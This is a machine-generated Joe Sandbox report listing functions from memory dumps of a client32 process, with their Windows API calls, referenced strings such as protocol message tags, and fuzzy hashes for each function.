Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
String ID:
API String ID: 705253285-0
Opcode ID: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
Instruction ID: ec5bb7023ba9694b1826725806baee6a54caa52fbc33dd5691a93a0cc33b1c6d
Opcode Fuzzy Hash: 2ffaf857092779b4cc8c6dc948aa08485a8b39598cc2e1fcd4f28cf9cf4d7f7e
Instruction Fuzzy Hash: C111C27A900B16ABE311CF60CC88BEFB7ECAF48358F004919FA2692141D370B540CB61

Function 1101D350 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D35E
LoadIconA.USER32(00000000,0000139A), ref: 1101D3AF
LoadCursorA.USER32(00000000,00007F00), ref: 1101D3BF
RegisterClassExA.USER32(00000030), ref: 1101D3E1
GetLastError.KERNEL32 ref: 1101D3E7

Strings

0, xrefs: 1101D36C

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$ClassCursorErrorIconLastRegister_memset
String ID: 0
API String ID: 430917334-4108050209
Opcode ID: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction ID: 2890e39c8948161dcf3a4c2706354c0f925fee5346d150246dd1548a136c71b7
Opcode Fuzzy Hash: 197adc6d2d185478f28bbd981e4be0813fa150b943be2939de94797b805e9323
Instruction Fuzzy Hash: D0018074D0131AABDB00EFE0C859B9DFBB4AB04308F508529F614BA284E7B511048B96

Function 11003340 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 1100334D
GetSubMenu.USER32(00000000,00000000), ref: 11003373
DestroyMenu.USER32(00000000), ref: 110033A2

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

hSub, xrefs: 11003389
hMenu, xrefs: 11003363
..\CTL32\annotate.cpp, xrefs: 1100335E, 11003384

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction ID: 58cfccb6135285d2752e7502dd052a47240bf2dd06342519f2e5277968a08211
Opcode Fuzzy Hash: b6ebe3cb19516443c737b85c4bf5343541eb5ddabd7932daa3618922ae928d72
Instruction Fuzzy Hash: 79F05C3EF0062663C22352263C49F4FB7684BC1AB8F110071F910FA744FE11A00041FA

Function 685B7A14 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 685B7A20

Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74

__calloc_crt.LIBCMT ref: 685B7A2B

Part of subcall function 685BD3F5: Sleep.KERNEL32(00000000,685B6F16,00000001,00000214), ref: 685BD41D

__lock.LIBCMT ref: 685B7A61
___addlocaleref.LIBCMT ref: 685B7A6D
__lock.LIBCMT ref: 685B7A81
InterlockedIncrement.KERNEL32(?), ref: 685B7A91

Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 3803058747-0
Opcode ID: 2cabe3ea8e7a6e37f275171f7c8f9dfe4839d8e7bc315f8413378a48e5cdbabe
Instruction ID: 085f5661b6385bf110cceee59c173f91d50daba2b60702536ce4614492e2f9f8
Opcode Fuzzy Hash: 2cabe3ea8e7a6e37f275171f7c8f9dfe4839d8e7bc315f8413378a48e5cdbabe
Instruction Fuzzy Hash: 8F01D43E504B01EFE710AFB4D82176D77F0AFA0728FA08109E954972C0DF754D408B51

Function 685A0C40 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 685A0D9C
__CxxThrowException@8.LIBCMT ref: 685A0DB1

Strings

DATA, xrefs: 685A0CE5
0f]h, xrefs: 685A0DA6, 685A0DA9
NAME, xrefs: 685A0CD0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: 0f]h$DATA$NAME
API String ID: 1338273076-3530225338
Opcode ID: c8414d9bac56906cb2c88c3334b72434370d89c2a7457bd78270e80646d59f77
Instruction ID: a9b0baae23d3308eb06caedf04afcfb8df62df33e001cf420b7242ecceca758c
Opcode Fuzzy Hash: c8414d9bac56906cb2c88c3334b72434370d89c2a7457bd78270e80646d59f77
Instruction Fuzzy Hash: 0941E7B5D00259AFDF54DFE9D880AEEFBB4FB48204F90452EE826A7240E7345A45CB91

Function 685A0B00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 685A0BA3
__CxxThrowException@8.LIBCMT ref: 685A0BB8

Strings

0f]h, xrefs: 685A0BAD, 685A0BB0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: 0f]h
API String ID: 1338273076-3511245404
Opcode ID: 04d1541900574d8fef642bd8c8ea5aac7357125da8a7e2915ebf19d126374f36
Instruction ID: 91ba79fc904edd45493b82d58066234a224ddab79a7039eab3bbb8d4ce635a88
Opcode Fuzzy Hash: 04d1541900574d8fef642bd8c8ea5aac7357125da8a7e2915ebf19d126374f36
Instruction Fuzzy Hash: FB3150B5900609AFCB24DF99C8819AFFBF8FF98610F50852FE95597700E774A904CBA1

Function 68592E50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

%s: , xrefs: 68592EFA
HTCTL32, xrefs: 68592E90, 68592EEF

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: HandleModule
String ID: %s: $HTCTL32
API String ID: 4139908857-3797952780
Opcode ID: 81cfda260cd4285072bee66aa340ee61eecc4beb05a340d95b717f92ed2af96d
Instruction ID: 93d36c71d2152a6f8de771bf9612add401eb1e1f4c734955234d1b452d3a10de
Opcode Fuzzy Hash: 81cfda260cd4285072bee66aa340ee61eecc4beb05a340d95b717f92ed2af96d
Instruction Fuzzy Hash: CA41F334900149DBCF01DF68DC58AEE7BB8EF8A345F508699EC2997240EB319A49CF94

Function 110331B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 110331C4
_strncpy.LIBCMT ref: 11033204
wsprintfA.USER32 ref: 11033272
_strncpy.LIBCMT ref: 110332CA

Strings

%s (%s), xrefs: 11033269

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
Instruction ID: 6d4a293539ff99ff9d91cd4089b7baa119477a06ea1ce5901e9509b66a7a6bff
Opcode Fuzzy Hash: 41cf12a399e40223a309384de66e6f5f00fee422c91aa36a5002e1312780ba24
Instruction Fuzzy Hash: 4731F374E143469FEB11CF24DCC4BA7BBE8AF85309F004968E9458B382E7B4E514CBA1

Function 6859CC90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 6859CCCD
__CxxThrowException@8.LIBCMT ref: 6859CCE2

Strings

0f]h, xrefs: 6859CD53, 6859CD57

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: 0f]h
API String ID: 1338273076-3511245404
Opcode ID: 8be444808bada0c714d03c237ed716dd54982ca79bb08060f51936bebbda16a0
Instruction ID: 87b8a1e276a08f7ef116c12cee3da467b27eeddadd71f34df064a9b0f14749b1
Opcode Fuzzy Hash: 8be444808bada0c714d03c237ed716dd54982ca79bb08060f51936bebbda16a0
Instruction Fuzzy Hash: 86314F749007089F8728DF58D5818ABF7F8FF98210B54896ED85A97720E730ED00CBD1

Function 110EB160 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,75C04C70), ref: 110EB1B1
_free.LIBCMT ref: 110EB1CC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
_free.LIBCMT ref: 110EB293

Strings

Error %d getting %s, xrefs: 110EB24D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast
String ID: Error %d getting %s
API String ID: 3888477750-2709163689
Opcode ID: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
Opcode Fuzzy Hash: 92455008d62525dafcdf8e23666724c203daf775c03ee8a075b6d364e35e82c3
Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1

Function 685AFAD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,89DA8021), ref: 685AFB04
std::_Xinvalid_argument.LIBCPMT ref: 685AFB3E
SetEvent.KERNEL32(?), ref: 685AFB69
LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 685AFBA4

Strings

list<T> too long, xrefs: 685AFB39

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
String ID: list<T> too long
API String ID: 930337060-4027344264
Opcode ID: aa89eb3ca2bfef3fb1eb9fd79b341c041c0c35b45fd8066fa600a09c4aebbde8
Instruction ID: 3d13b4f10331d86cf535298b047c216756b78bb4b72ac2e256affd3daeb9b0f1
Opcode Fuzzy Hash: aa89eb3ca2bfef3fb1eb9fd79b341c041c0c35b45fd8066fa600a09c4aebbde8
Instruction Fuzzy Hash: 0A316175604608AFC714CF68C894AAEBBF8FB49310F508A1DE85A97784D770E900CB64

Function 6859BAC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

_free.LIBCMT ref: 6859BB46

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

Strings

UF=%d, xrefs: 6859BB09
CMD=MESSAGERECEIVED, xrefs: 6859BAE0
UN=%s, xrefs: 6859BB3A
ID=%d, xrefs: 6859BAF7

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
API String ID: 3180605519-2489130399
Opcode ID: be1b2ed499a75c248dc436f0a15684de5e59ac6cdfaa25d7c62d9ecc53664481
Instruction ID: ed2e5005472555561ffbdb7ecee43a2ef06d5446aa46d8e385a5483ccb560183
Opcode Fuzzy Hash: be1b2ed499a75c248dc436f0a15684de5e59ac6cdfaa25d7c62d9ecc53664481
Instruction Fuzzy Hash: 9E211DBA940208BBDB15DBA4CD80EFFB77DAF84204F904545E946A7145EB30EE04C7B6

Function 6859BB90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

_free.LIBCMT ref: 6859BC16

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

Strings

UF=%d, xrefs: 6859BBD9
UN=%s, xrefs: 6859BC0A
ID=%d, xrefs: 6859BBC7
CMD=MESSAGEACK, xrefs: 6859BBB0

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
API String ID: 3180605519-89615960
Opcode ID: 3e97e1d741069c379ac5f2331bc110e81aace23006c012c3450ae54fd05b010f
Instruction ID: c2cc48c68490ca840d2fe1c96b69fa4519afb4067d5fc353c0cfbf07b9cf76c3
Opcode Fuzzy Hash: 3e97e1d741069c379ac5f2331bc110e81aace23006c012c3450ae54fd05b010f
Instruction Fuzzy Hash: 10211ABA940209BAEB11DBA4CD80FFF777C9B84204F904545E946A7145EB30EE44C7B6

Function 68592A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
_strrchr.LIBCMT ref: 68592ADA
_strrchr.LIBCMT ref: 68592AEA
wsprintfA.USER32 ref: 68592B05

Part of subcall function 68592CE0: GetModuleHandleA.KERNEL32(NSMTRACE,68592AB1), ref: 68592CFA

Strings

HTCTL32, xrefs: 68592B00, 68592B0E, 68592B15, 68592B42

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Module_strrchr$FileHandleNamewsprintf
String ID: HTCTL32
API String ID: 2529650285-1670862073
Opcode ID: 4cf07edff2dc204f15538a2f7aae05fd5e90645a6e982b2df453630d2fbad792
Instruction ID: 7e4cd7d35d273060ca59b75ad80e455c758136003456b1f86abd4d2dda8c7ba4
